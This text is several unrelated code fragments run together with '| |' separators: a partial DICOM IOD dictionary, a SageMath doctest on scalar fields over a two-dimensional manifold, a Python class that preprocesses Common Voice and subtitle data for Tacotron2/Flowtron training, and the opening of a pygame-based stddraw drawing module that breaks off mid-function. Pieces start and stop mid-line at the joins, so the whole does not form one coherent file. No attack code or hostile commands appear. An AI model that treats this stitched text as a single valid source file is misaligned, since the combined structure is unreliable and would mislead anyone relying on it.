'PROCEDURE LOG IOD': ['Study'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Study'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Study'],
'STEREOMETRIC RELATIONSHIP IOD': ['Study'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Study'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Study'],
'VL ENDOSCOPIC IMAGE IOD': ['Study'],
'KERATOMETRY MEASUREMENTS IOD': ['Study'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE | |
M,
Open subset U of the 2-dimensional topological manifold M)
sage: s = f*g ; s
Scalar field f*g on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
f*g: U --> R
(x, y) |--> x*y/(x^2 + y^2 + 1)
on W: (u, v) |--> u*v/(u^4 + v^4 + (2*u^2 + 1)*v^2 + u^2)
sage: s == f.restrict(U)*g
True
Scalar fields can be divided (pointwise division)::
sage: s = f/c ; s
Scalar field f/c on the 2-dimensional topological manifold M
sage: s.display()
f/c: M --> R
on U: (x, y) |--> 1/(a*x^2 + a*y^2 + a)
on V: (u, v) |--> (u^2 + v^2)/(a*u^2 + a*v^2 + a)
sage: s = g/h ; s
Scalar field g/h on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
g/h: U --> R
(x, y) |--> x*y/H(x, y)
on W: (u, v) |--> u*v/((u^4 + 2*u^2*v^2 + v^4)*H(u/(u^2 + v^2), v/(u^2 + v^2)))
sage: s = f/g ; s
Scalar field f/g on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
f/g: U --> R
(x, y) |--> 1/(x*y^3 + (x^3 + x)*y)
on W: (u, v) |--> (u^6 + 3*u^4*v^2 + 3*u^2*v^4 + v^6)/(u*v^3 + (u^3 + u)*v)
sage: s == f.restrict(U)/g
True
For scalar fields defined on a single chart domain, we may perform some
arithmetic with symbolic expressions involving the chart coordinates::
sage: s = g + x^2 - y ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> x^2 + (x - 1)*y
on W: (u, v) |--> -(v^3 - u^2 + (u^2 - u)*v)/(u^4 + 2*u^2*v^2 + v^4)
::
sage: s = g*x ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> x^2*y
on W: (u, v) |--> u^2*v/(u^6 + 3*u^4*v^2 + 3*u^2*v^4 + v^6)
::
sage: s = g/x ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> y
on W: (u, v) |--> v/(u^2 + v^2)
sage: s = x/g ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> 1/y
on W: (u, v) |--> (u^2 + v^2)/v
.. RUBRIC:: Examples with SymPy as the symbolic engine
From now on, we ask that all symbolic calculus on the manifold `M` be
performed by SymPy::
sage: M.set_calculus_method('sympy')
We define `f` as above::
sage: f = M.scalar_field({c_xy: 1/(1+x^2+y^2), c_uv: (u^2+v^2)/(1+u^2+v^2)},
....: name='f') ; f
Scalar field f on the 2-dimensional topological manifold M
sage: f.display() # notice the SymPy display of exponents
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
sage: type(f.coord_function(c_xy).expr())
<class 'sympy.core.power.Pow'>
The scalar field `g` defined on `U`::
sage: g = U.scalar_field({c_xy: x*y}, name='g')
sage: g.display() # again notice the SymPy display of exponents
g: U --> R
(x, y) |--> x*y
on W: (u, v) |--> u*v/(u**4 + 2*u**2*v**2 + v**4)
Definition on a single chart and subsequent completion::
sage: f = M.scalar_field(1/(1+x^2+y^2), chart=c_xy, name='f')
sage: f.add_expr((u^2+v^2)/(1+u^2+v^2), chart=c_uv)
sage: f.display()
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
Definition without any coordinate expression and subsequent completion::
sage: f = M.scalar_field(name='f')
sage: f.add_expr(1/(1+x^2+y^2), chart=c_xy)
sage: f.add_expr((u^2+v^2)/(1+u^2+v^2), chart=c_uv)
sage: f.display()
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
Use of :meth:`add_expr_by_continuation`::
sage: f = M.scalar_field(1/(1+x^2+y^2), chart=c_xy, name='f')
sage: f.add_expr_by_continuation(c_uv, U.intersection(V))
sage: f.display()
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
A scalar field defined by some unspecified function of the
coordinates::
sage: h = U.scalar_field(function('H')(x, y), name='h') ; h
Scalar field h on the Open subset U of the 2-dimensional topological
manifold M
sage: h.display()
h: U --> R
(x, y) |--> H(x, y)
on W: (u, v) |--> H(u/(u**2 + v**2), v/(u**2 + v**2))
The coordinate expression in a given chart is obtained via the method
:meth:`expr`, which in the present context, returns a SymPy object::
sage: f.expr(c_uv)
(u**2 + v**2)/(u**2 + v**2 + 1)
sage: type(f.expr(c_uv))
<class 'sympy.core.mul.Mul'>
The method :meth:`coord_function` returns instead a function of the
chart coordinates, i.e. an instance of
:class:`~sage.manifolds.chart_func.ChartFunction`::
sage: f.coord_function(c_uv)
(u**2 + v**2)/(u**2 + v**2 + 1)
sage: type(f.coord_function(c_uv))
<class 'sage.manifolds.chart_func.ChartFunctionRing_with_category.element_class'>
sage: f.coord_function(c_uv).display()
(u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
The value returned by the method :meth:`expr` is actually the coordinate
expression of the chart function::
sage: f.expr(c_uv) is f.coord_function(c_uv).expr()
True
We may ask for the ``SR`` representation of the coordinate function::
sage: f.coord_function(c_uv).expr('SR')
(u^2 + v^2)/(u^2 + v^2 + 1)
A constant scalar field with SymPy representation::
sage: c = M.constant_scalar_field(2, name='c')
sage: c.display()
c: M --> R
on U: (x, y) |--> 2
on V: (u, v) |--> 2
sage: type(c.expr(c_xy))
<class 'sympy.core.numbers.Integer'>
The constant value can be some unspecified parameter::
sage: var('a')
a
sage: c = M.constant_scalar_field(a, name='c')
sage: c.display()
c: M --> R
on U: (x, y) |--> a
on V: (u, v) |--> a
sage: type(c.expr(c_xy))
<class 'sympy.core.symbol.Symbol'>
The zero scalar field::
sage: zer = M.constant_scalar_field(0) ; zer
Scalar field zero on the 2-dimensional topological manifold M
sage: zer.display()
zero: M --> R
on U: (x, y) |--> 0
on V: (u, v) |--> 0
sage: type(zer.expr(c_xy))
<class 'sympy.core.numbers.Zero'>
sage: zer is M.zero_scalar_field()
True
Action of scalar fields on manifold's points::
sage: N = M.point((0,0), chart=c_uv) # the North pole
sage: S = M.point((0,0), chart=c_xy) # the South pole
sage: E = M.point((1,0), chart=c_xy) # a point at the equator
sage: f(N)
0
sage: f(S)
1
sage: f(E)
1/2
sage: h(E)
H(1, 0)
sage: c(E)
a
sage: zer(E)
0
A scalar field can be compared to another scalar field::
sage: f == g
False
...to a symbolic expression::
sage: f == x*y
False
sage: g == x*y
True
sage: c == a
True
...to a number::
sage: f == 2
False
sage: zer == 0
True
...to anything else::
sage: f == M
False
Standard mathematical functions are implemented::
sage: sqrt(f)
Scalar field sqrt(f) on the 2-dimensional topological manifold M
sage: sqrt(f).display()
sqrt(f): M --> R
on U: (x, y) |--> 1/sqrt(x**2 + y**2 + 1)
on V: (u, v) |--> sqrt(u**2 + v**2)/sqrt(u**2 + v**2 + 1)
::
sage: tan(f)
Scalar field tan(f) on the 2-dimensional topological manifold M
sage: tan(f).display()
tan(f): M --> R
on U: (x, y) |--> tan(1/(x**2 + y**2 + 1))
on V: (u, v) |--> tan((u**2 + v**2)/(u**2 + v**2 + 1))
.. RUBRIC:: Arithmetic of scalar fields with SymPy
Scalar fields on `M` (resp. `U`) belong to the algebra `C^0(M)`
(resp. `C^0(U)`)::
sage: f.parent()
Algebra of scalar fields on the 2-dimensional topological manifold M
sage: f.parent() is M.scalar_field_algebra()
True
sage: g.parent()
Algebra of scalar fields on the Open subset U of the 2-dimensional
topological manifold M
sage: g.parent() is U.scalar_field_algebra()
True
Consequently, scalar fields can be added::
sage: s = f + c ; s
Scalar field f+c on the 2-dimensional topological manifold M
sage: s.display()
f+c: M --> R
on U: (x, y) |--> (a*x**2 + a*y**2 + a + 1)/(x**2 + y**2 + 1)
on V: (u, v) |--> (a*u**2 + a*v**2 + a + u**2 + v**2)/(u**2 + v**2 + 1)
and subtracted::
sage: s = f - c ; | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import pandas as pd
from tqdm import tqdm
import re
from multiprocessing import Pool
from modules.Global.variable import Var
from modules.preprocessing.cleaner import DataCleaner
from modules.preprocessing.time import TimePreprocessor
import librosa
class DataPreprocessor:
'''
Class providing data preprocessing utilities
'''
END_CHARS = Var().END_CHARS
NB_LIMIT_FILE_CLUSTER = Var().NB_LIMIT_FILE_CLUSTER
def __init__(self, dataframe=None):
self.dataframe = dataframe
def _find_user_information(self, user_id, user_column):
'''
Method used to get user data
Parameters
----------
user_id : string
User ID
user_column : string
Name of the column containing user name, id or anything else...
Returns
-------
tuple
User ID and the dataframe related to the given user ID
'''
return user_id, self.dataframe[self.dataframe[user_column]==user_id]
def _find_max_user(self, list_user, list_number_element, list_option_element, option):
'''
Find the user who has the largest number of elements
Parameters
----------
list_user : list
list of user identifiers
list_number_element : list
number of elements per user, in the same order as list_user
list_option_element : list
optional attribute per user, in the same order as list_user
option : string
optional attribute value used to restrict which users are considered
Returns
-------
string
The user who has the largest number of elements
'''
if option is None:
biggest_user = list_user[list_number_element.index(max(list_number_element))]
else:
index_option = [i for i,x in enumerate(list_option_element) if str(x).lower() == option]
list_user_option = [list_user[index] for index in index_option]
list_number_element_option = [list_number_element[index] for index in index_option]
biggest_user = list_user_option[list_number_element_option.index(max(list_number_element_option))]
return biggest_user
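# Example (illustrative): with list_user == ['a', 'b'], list_number_element
# == [10, 25] and list_option_element == ['female', 'male'], option == None
# returns 'b' (the most elements overall), while option == 'female' restricts
# the search to 'a' and returns it even though 'b' has more elements.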
def convert_data_mcv_to_taflowtron(self,
user_column,
path_column,
element_column,
data_directory,
data_directory_preprocessed,
cleaner,
tts,
user_id=None,
option_column=None,
option_value=None,
format_conversion=".wav",
speaker_whitelist=None,
duration_minimum_user=300):
'''
From a dataframe containing audio information in Mozilla Common Voice format, convert it
into the taflowtron filelist format
Parameters
----------
user_column : string
Name of the column containing user name, id or anything else...
path_column : string
Name of the column containing file path
element_column : string
Name of the column containing the element (transcript) of the user
data_directory : string
directory containing audio data
data_directory_preprocessed : string
directory that will contain the preprocessed audio data
cleaner : dataframe
table containing regex and substitution
user_id : list
list of user IDs to select
tts : string
name of the tts to use; flowtron or tacotron2
option_column : string
Name of an additional column to consider when finding a user
option_value : string
option value used to restrict which users are considered when finding the max user
format_conversion : string
format used by tacotron2 training (always .wav)
speaker_whitelist : list
list of speaker IDs to use
duration_minimum_user : int
minimum total audio duration in seconds required per user
Returns
-------
Pandas dataframe
taflowtron filelist (dataframe or list), dataframe containing information about users, number of speakers
'''
if speaker_whitelist is None:
list_user_id = list(self.dataframe[user_column].unique())
else:
list_user_id = speaker_whitelist
#Set the maximum number of parallel processes
nb_max_parallelized_process = min(len(list_user_id), os.cpu_count())
list_arg = [(user_id, user_column) for user_id in list_user_id]
with Pool(processes=nb_max_parallelized_process) as pool:
res = pool.starmap(self._find_user_information, tqdm(list_arg))
list_user = []
list_number_element = []
list_user_df = []
list_option_element = []
for index in range(len(res)):
list_user.append(res[index][0])
list_number_element.append(res[index][1].shape[0])
list_user_df.append(res[index][1])
if option_column is not None: list_option_element.append(list(list_user_df[index][option_column].unique())[0])
data_info = pd.DataFrame({user_column:list_user,element_column:list_number_element,option_column:list_option_element},columns=[user_column, element_column, option_column])
if tts == "tacotron2":
user = self._find_max_user(list_user, list_number_element, list_option_element, option_value)
table = self.dataframe[self.dataframe[user_column]==user][[path_column,element_column]]
table[element_column] = DataCleaner().clean_text(data=table[element_column],
cleaner=cleaner)
table_filelist = table.apply(lambda x : os.path.join(data_directory_preprocessed,os.path.splitext(x[path_column])[0]+format_conversion) + "|" + x[element_column], axis=1).reset_index(drop=True)
return table_filelist, data_info, 0
if tts == "flowtron":
list_audio_path = []
list_subtitle = []
list_speaker_id = []
list_duration = []
dir_to_create = []
list_original_path = []
nb_user = 0
for index, user in enumerate(tqdm(list_user)):
table = list_user_df[index][[path_column,element_column]]
list_original_path_user = [os.path.join(data_directory,audio_path) for audio_path in table[path_column]]
duration_user = sum([librosa.get_duration(filename=file) for file in list_original_path_user])
list_duration.append(duration_user)
if duration_user >= duration_minimum_user:
len_table = table.shape[0]
table[element_column] = DataCleaner().clean_text(data=table[element_column],
cleaner=cleaner)
nb_part = len_table // (self.NB_LIMIT_FILE_CLUSTER + 1)
part_extension = ["part_" + str(index) for index in range(nb_part+1)]
dir_to_create += [os.path.join(data_directory_preprocessed,user,part) for part in part_extension]
list_original_path += list_original_path_user
list_audio_path += [os.path.join(data_directory_preprocessed,user,part_extension[index//(self.NB_LIMIT_FILE_CLUSTER+1)],os.path.splitext(list(table[path_column])[index])[0]+format_conversion) for index in range(len_table)]
list_subtitle += list(table[element_column])
list_speaker_id += [str(index)]*len_table
nb_user += 1
else:
print("Total user duration is: " + str(duration_user) + " second(s) from: " + str(user) + " is below to: " + str(duration_minimum_user) + " second(s), this user will be filtered out.")
data_info["Duration"] = list_duration
return list_audio_path, list_subtitle, list_speaker_id, data_info, nb_user, dir_to_create, list_original_path
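# Output sketch (illustrative): for tts == "tacotron2" each filelist row has
# the form "<data_directory_preprocessed>/<clip>.wav|<cleaned transcript>",
# while for tts == "flowtron" the parallel lists returned above pair every
# audio path with its subtitle and a numeric speaker id ("0", "1", ...),
# which a caller would typically join as "path|subtitle|speaker_id".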
def _useless_data(self, data):
'''
Find the indices of useless entries (bracketed or empty subtitles) to remove before training taflowtron
Parameters
----------
data : list
list of data containing string
Returns
-------
list
list of indices to remove from data
'''
        index_to_remove = [index for index, element in enumerate(data) if len(element) > 0 and element[0] == '[']
index_to_remove += [index for index,element in enumerate(data) if len(element) == 0]
return index_to_remove
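    # Illustrative sketch (added for clarity): for data = ['hello', '[Music]', '']
    # this returns [1, 2] -- the index of the bracketed tag and of the empty
    # string -- which the caller then drops from both list_time and list_subtitle.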
def _concatenate_subtitle(self, list_time, list_subtitle, max_limit_duration, min_limit_duration):
'''
Concatenate subtitle to get long sentences and not cut sentences
Parameters
----------
list_time : list
list of data containing time
list_subtitle : list
list of data containing string
max_limit_duration : int
maximum audio length/duration authorized
min_limit_duration : int
minimum audio length/duration authorized
Returns
-------
        tuple
            new_list_time and new_list_subtitle, the concatenated (start, end) times and subtitles
'''
align_duration = 10
new_list_time = []
new_list_subtitle = []
index = 0
while index < len(list_subtitle):
compt = 0
subtitle = list_subtitle[index]
beg_time = list_time[index][0]
end_time = list_time[index][1]
if index+compt < len(list_subtitle)-1 and (list_time[index+compt][1] - list_time[index+compt][0]) != align_duration:
#If not out of index range and duration is not the aligned 10 ms one
while (list_time[index+compt+1][1] - beg_time) <= max_limit_duration \
and list_time[index+compt][1] == list_time[index+compt+1][0] \
and list_subtitle[index+compt][-1] not in self.END_CHARS:
                    #Concatenate the next subtitle if:
                    #- the combined duration stays within max_limit_duration
                    #- the next timestamp starts exactly where the current one ends (FOR FUTURE: maybe also concatenate if the gap is < 10 ms)
                    #- the current subtitle does not end with an end character
if (list_time[index+compt+1][1] - list_time[index+compt+1][0]) != align_duration:
#If duration is not 10ms, concatenation is done
subtitle += " " + list_subtitle[index+compt+1]
end_time = list_time[index+compt+1][1]
compt += 1
if index+compt >= len(list_subtitle)-1:
break
new_list_time.append((beg_time,end_time))
new_list_subtitle.append(subtitle)
index += compt + 1
#Remove audio smaller than min_limit_duration
new_list_subtitle = [subtitle for index,subtitle in enumerate(new_list_subtitle) if new_list_time[index][1] - new_list_time[index][0] >= min_limit_duration]
new_list_time = [time for time in new_list_time if time[1] - time[0] >= min_limit_duration]
return new_list_time, new_list_subtitle
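    # Illustrative sketch of the concatenation above (added for clarity; the
    # millisecond timestamps are made up and END_CHARS is assumed to contain
    # sentence-ending punctuation such as '.', '!' and '?'):
    #
    #   list_time     = [(0, 4000), (4000, 7000), (7000, 7500)]
    #   list_subtitle = ["hello there", "how are", "you today?"]
    #
    # With max_limit_duration=10000 and min_limit_duration=1000 the three chunks
    # are merged into a single ((0, 7500), "hello there how are you today?")
    # pair: each chunk starts where the previous one ends, neither of the first
    # two chunks ends with an end character, and the combined duration stays
    # under the 10 s limit.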
def get_info_from_vtt(self, data, cleaner, concatenate=False, max_limit_duration=10000, min_limit_duration=1000, use_youtube_transcript_api=True):
'''
        Get the start/end time of each subtitle and the subtitle text
Parameters
----------
data : list
list of vtt data
cleaner : dataframe
table containing regex and substitution
concatenate : boolean
            concatenate VTT subtitles, using timestamps and end characters, to build longer sentences
max_limit_duration : int
maximum audio length/duration authorized
min_limit_duration : int
minimum audio length/duration authorized
use_youtube_transcript_api : boolean
use or not youtube_transcript_api
Returns
-------
        tuple
            a list of (start, end) times in milliseconds and the corresponding list of subtitles
'''
list_time = []
list_subtitle = []
if use_youtube_transcript_api:
list_subtitle = [element['text'] for element in data]
list_time = [(element['start']*1000,(element['start']+element['duration'])*1000) for element in data]
else:
index = 0
while index < len(data):
element = data[index]
compt = 1
subtitle = ''
if re.search(r'\d\d\:\d\d\:\d\d\.\d\d\d --> \d\d\:\d\d\:\d\d\.\d\d\d', element):
list_time.append(re.findall(r'(\d\d\:\d\d\:\d\d\.\d\d\d) --> (\d\d\:\d\d\:\d\d\.\d\d\d)', element))
while data[index + compt] != '\n':
subtitle += data[index + compt]
compt += 1
list_subtitle.append(subtitle)
index += 1
list_time = [(TimePreprocessor().convert_time_format(time[0][0]),TimePreprocessor().convert_time_format(time[0][1])) for time in list_time]
list_subtitle = DataCleaner().clean_text(data=list_subtitle,
cleaner=cleaner)
index_to_remove = self._useless_data(list_subtitle)
list_time = [element for index,element in enumerate(list_time) if index not in index_to_remove]
list_subtitle = [element for index,element in enumerate(list_subtitle) if index not in index_to_remove]
'''
Concatenation of sentence/subtitle
'''
if concatenate:
list_time, list_subtitle = self._concatenate_subtitle(list_time, list_subtitle, max_limit_duration, min_limit_duration)
return list_time, list_subtitle
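    # Illustrative sketch (added for clarity; values are made up): with
    # use_youtube_transcript_api=True an entry such as
    #   {'text': 'hello world', 'start': 1.2, 'duration': 2.5}
    # contributes (1200.0, 3700.0) to list_time and 'hello world' (after
    # cleaning) to list_subtitle, i.e. times are converted from seconds to
    # milliseconds before the optional concatenation step.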
def get_ITN_data(self, data_text, data_option=None, language="en"):
'''
Find ITN/symbols elements in text
Parameters
----------
data_text : list
list containing text
        data_option : list
            list containing other data, for instance the audio path related to each entry of data_text
        language : string
            language used to select the matching regex (words are matched according to this language)
Returns
-------
list
list of ITN/symbols found
'''
        regex_match_only_digit = re.compile(r'^\d+\.?$')
        if language == "en":
            regex_match = re.compile(r'[^a-zA-Z-\']+')
            regex_match_punctuation = re.compile(r'[a-zA-Z]{3,}[,.;:]')
        if language == "fr":
            regex_match = re.compile(r'[^ABCDEFGHIJKLMNOPQRSTUVWXYZÉÈÊËÂÀÄÙÛÜÎÏÔÖŸÆŒÇabcdefghijklmnopqrstuvwxyzéèêëâàäùûüîïôöÿæœç\-\']+')
            regex_match_punctuation = re.compile(r'[ABCDEFGHIJKLMNOPQRSTUVWXYZÉÈÊËÂÀÄÙÛÜÎÏÔÖŸÆŒÇabcdefghijklmnopqrstuvwxyzéèêëâàäùûüîïôöÿæœç\-\']{3,}[,.;:]')
if data_option is not None:
            return [word + "\t" + sentence + "\t" + data_option[index] for index,sentence in
"""
stddraw.py
The stddraw module defines functions that allow the user to create a
drawing. A drawing appears on the canvas. The canvas appears
in the window. As a convenience, the module also imports the
commonly used Color objects defined in the color module.
"""
import time
import os
import sys
import pygame
import pygame.gfxdraw
import pygame.font
import color
import string
if (sys.hexversion < 0x03000000):
import Tkinter
import tkMessageBox
import tkFileDialog
else:
import tkinter as Tkinter
import tkinter.messagebox as tkMessageBox
import tkinter.filedialog as tkFileDialog
#-----------------------------------------------------------------------
# Define colors so clients need not import the color module.
from color import WHITE
from color import BLACK
from color import RED
from color import GREEN
from color import BLUE
from color import CYAN
from color import MAGENTA
from color import YELLOW
from color import DARK_RED
from color import DARK_GREEN
from color import DARK_BLUE
from color import GRAY
from color import DARK_GRAY
from color import LIGHT_GRAY
from color import ORANGE
from color import VIOLET
from color import PINK
from color import BOOK_BLUE
from color import BOOK_LIGHT_BLUE
from color import BOOK_RED
#-----------------------------------------------------------------------
# Default Sizes and Values
_BORDER = 0.0
#_BORDER = 0.05
_DEFAULT_XMIN = 0.0
_DEFAULT_XMAX = 1.0
_DEFAULT_YMIN = 0.0
_DEFAULT_YMAX = 1.0
_DEFAULT_CANVAS_SIZE = 512
_DEFAULT_PEN_RADIUS = .005 # Maybe change this to 0.0 in the future.
_DEFAULT_PEN_COLOR = color.BLACK
_DEFAULT_FONT_FAMILY = 'Helvetica'
_DEFAULT_FONT_SIZE = 12
_xmin = None
_ymin = None
_xmax = None
_ymax = None
_fontFamily = _DEFAULT_FONT_FAMILY
_fontSize = _DEFAULT_FONT_SIZE
_canvasWidth = float(_DEFAULT_CANVAS_SIZE)
_canvasHeight = float(_DEFAULT_CANVAS_SIZE)
_penRadius = None
_penColor = _DEFAULT_PEN_COLOR
_keysTyped = []
# Has the window been created?
_windowCreated = False
#-----------------------------------------------------------------------
# Begin added by <NAME>
#-----------------------------------------------------------------------
# Keep track of mouse status
# Has the mouse been left-clicked since the last time we checked?
_mousePressed = False
# The position of the mouse as of the most recent mouse click
_mousePos = None
#-----------------------------------------------------------------------
# End added by <NAME>
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
def _pygameColor(c):
"""
Convert c, an object of type color.Color, to an equivalent object
of type pygame.Color. Return the result.
"""
r = c.getRed()
g = c.getGreen()
b = c.getBlue()
return pygame.Color(r, g, b)
#-----------------------------------------------------------------------
# Private functions to scale and factor X and Y values.
def _scaleX(x):
return _canvasWidth * (x - _xmin) / (_xmax - _xmin)
def _scaleY(y):
return _canvasHeight * (_ymax - y) / (_ymax - _ymin)
def _factorX(w):
return w * _canvasWidth / abs(_xmax - _xmin)
def _factorY(h):
return h * _canvasHeight / abs(_ymax - _ymin)
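# Worked example (added for clarity): with the default scales set by
# setXscale()/setYscale() (_xmin=0, _xmax=1, _ymin=0, _ymax=1) and the default
# 512x512 canvas, the user point (0.25, 0.25) maps to pixel coordinates
# _scaleX(0.25) = 512 * 0.25 = 128.0 and _scaleY(0.25) = 512 * 0.75 = 384.0;
# y is flipped because pixel rows grow downward from the top of the window.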
#-----------------------------------------------------------------------
# Begin added by <NAME>
#-----------------------------------------------------------------------
def _userX(x):
return _xmin + x * (_xmax - _xmin) / _canvasWidth
def _userY(y):
return _ymax - y * (_ymax - _ymin) / _canvasHeight
#-----------------------------------------------------------------------
# End added by <NAME>
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
def setCanvasSize(w=_DEFAULT_CANVAS_SIZE, h=_DEFAULT_CANVAS_SIZE):
"""
Set the size of the canvas to w pixels wide and h pixels high.
Calling this function is optional. If you call it, you must do
so before calling any drawing function.
"""
global _background
global _surface
global _canvasWidth
global _canvasHeight
global _windowCreated
if _windowCreated:
raise Exception('The stddraw window already was created')
if (w < 1) or (h < 1):
raise Exception('width and height must be positive')
_canvasWidth = w
_canvasHeight = h
_background = pygame.display.set_mode([w, h])
pygame.display.set_caption('stddraw window (r-click to save)')
_surface = pygame.Surface((w, h))
_surface.fill(_pygameColor(WHITE))
_windowCreated = True
def setXscale(min=_DEFAULT_XMIN, max=_DEFAULT_XMAX):
"""
Set the x-scale of the canvas such that the minimum x value
is min and the maximum x value is max.
"""
global _xmin
global _xmax
min = float(min)
max = float(max)
if min >= max:
raise Exception('min must be less than max')
size = max - min
_xmin = min - _BORDER * size
_xmax = max + _BORDER * size
def setYscale(min=_DEFAULT_YMIN, max=_DEFAULT_YMAX):
"""
Set the y-scale of the canvas such that the minimum y value
is min and the maximum y value is max.
"""
global _ymin
global _ymax
min = float(min)
max = float(max)
if min >= max:
raise Exception('min must be less than max')
size = max - min
_ymin = min - _BORDER * size
_ymax = max + _BORDER * size
def setPenRadius(r=_DEFAULT_PEN_RADIUS):
"""
Set the pen radius to r, thus affecting the subsequent drawing
of points and lines. If r is 0.0, then points will be drawn with
the minimum possible radius and lines with the minimum possible
width.
"""
global _penRadius
r = float(r)
if r < 0.0:
raise Exception('Argument to setPenRadius() must be non-neg')
_penRadius = r * float(_DEFAULT_CANVAS_SIZE)
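# Note (added for clarity): the pen radius is stored in pixels relative to the
# default canvas size, e.g. the default r = .005 gives 0.005 * 512 = 2.56
# pixels, so point() draws a small filled ellipse; it falls back to a single
# pixel only when the stored radius is <= 1.0 (i.e. r <= 1/512).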
def setPenColor(c=_DEFAULT_PEN_COLOR):
"""
Set the pen color to c, where c is an object of class color.Color.
c defaults to stddraw.BLACK.
"""
global _penColor
_penColor = c
def setFontFamily(f=_DEFAULT_FONT_FAMILY):
"""
Set the font family to f (e.g. 'Helvetica' or 'Courier').
"""
global _fontFamily
_fontFamily = f
def setFontSize(s=_DEFAULT_FONT_SIZE):
"""
Set the font size to s (e.g. 12 or 16).
"""
global _fontSize
_fontSize = s
#-----------------------------------------------------------------------
def _makeSureWindowCreated():
global _windowCreated
if not _windowCreated:
setCanvasSize()
_windowCreated = True
#-----------------------------------------------------------------------
# Functions to draw shapes, text, and images on the background canvas.
def _pixel(x, y):
"""
Draw on the background canvas a pixel at (x, y).
"""
_makeSureWindowCreated()
xs = _scaleX(x)
    ys = _scaleY(y)
pygame.gfxdraw.pixel(
_surface,
int(round(xs)),
        int(round(ys)),
_pygameColor(_penColor))
def point(x, y):
"""
Draw on the background canvas a point at (x, y).
"""
_makeSureWindowCreated()
x = float(x)
y = float(y)
# If the radius is too small, then simply draw a pixel.
if _penRadius <= 1.0:
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.ellipse(
_surface,
_pygameColor(_penColor),
pygame.Rect(
xs-_penRadius,
ys-_penRadius,
_penRadius*2.0,
_penRadius*2.0),
0)
def _thickLine(x0, y0, x1, y1, r):
"""
Draw on the background canvas a line from (x0, y0) to (x1, y1).
Draw the line with a pen whose radius is r.
"""
xs0 = _scaleX(x0)
ys0 = _scaleY(y0)
xs1 = _scaleX(x1)
ys1 = _scaleY(y1)
if (abs(xs0-xs1) < 1.0) and (abs(ys0-ys1) < 1.0):
filledCircle(x0, y0, r)
return
xMid = (x0+x1)/2
yMid = (y0+y1)/2
_thickLine(x0, y0, xMid, yMid, r)
_thickLine(xMid, yMid, x1, y1, r)
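# Note (added for clarity): _thickLine() renders a thick segment by recursive
# bisection -- once the scaled endpoints are within one pixel of each other it
# stamps a filled circle of radius r, otherwise it splits the segment at its
# midpoint and recurses on both halves, so a thick line is drawn as a chain of
# overlapping filled circles.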
def line(x0, y0, x1, y1):
"""
Draw on the background canvas a line from (x0, y0) to (x1, y1).
"""
THICK_LINE_CUTOFF = 3 # pixels
_makeSureWindowCreated()
x0 = float(x0)
y0 = float(y0)
x1 = float(x1)
y1 = float(y1)
lineWidth = _penRadius * 2.0
if lineWidth == 0.0: lineWidth = 1.0
if lineWidth < THICK_LINE_CUTOFF:
x0s = _scaleX(x0)
y0s = _scaleY(y0)
x1s = _scaleX(x1)
y1s = _scaleY(y1)
pygame.draw.line(
_surface,
_pygameColor(_penColor),
(x0s, y0s),
(x1s, y1s),
int(round(lineWidth)))
else:
_thickLine(x0, y0, x1, y1, _penRadius/_DEFAULT_CANVAS_SIZE)
def circle(x, y, r):
"""
Draw on the background canvas a circle of radius r centered on
(x, y).
"""
_makeSureWindowCreated()
x = float(x)
y = float(y)
r = float(r)
ws = _factorX(2.0*r)
hs = _factorY(2.0*r)
# If the radius is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.ellipse(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs-ws/2.0, ys-hs/2.0, ws, hs),
int(round(_penRadius)))
def filledCircle(x, y, r):
"""
Draw on the background canvas a filled circle of radius r
centered on (x, y).
"""
_makeSureWindowCreated()
x = float(x)
y = float(y)
r = float(r)
ws = _factorX(2.0*r)
hs = _factorY(2.0*r)
# If the radius is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.ellipse(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs-ws/2.0, ys-hs/2.0, ws, hs),
0)
def rectangle(x, y, w, h):
"""
Draw on the background canvas a rectangle of width w and height h
whose lower left point is (x, y).
"""
global _surface
_makeSureWindowCreated()
x = float(x)
y = float(y)
w = float(w)
h = float(h)
ws = _factorX(w)
hs = _factorY(h)
# If the rectangle is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.rect(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs, ys-hs, ws, hs),
int(round(_penRadius)))
def filledRectangle(x, y, w, h):
"""
Draw on the background canvas a filled rectangle of width w and
height h whose lower left point is (x, y).
"""
global _surface
_makeSureWindowCreated()
x = float(x)
y = float(y)
w = float(w)
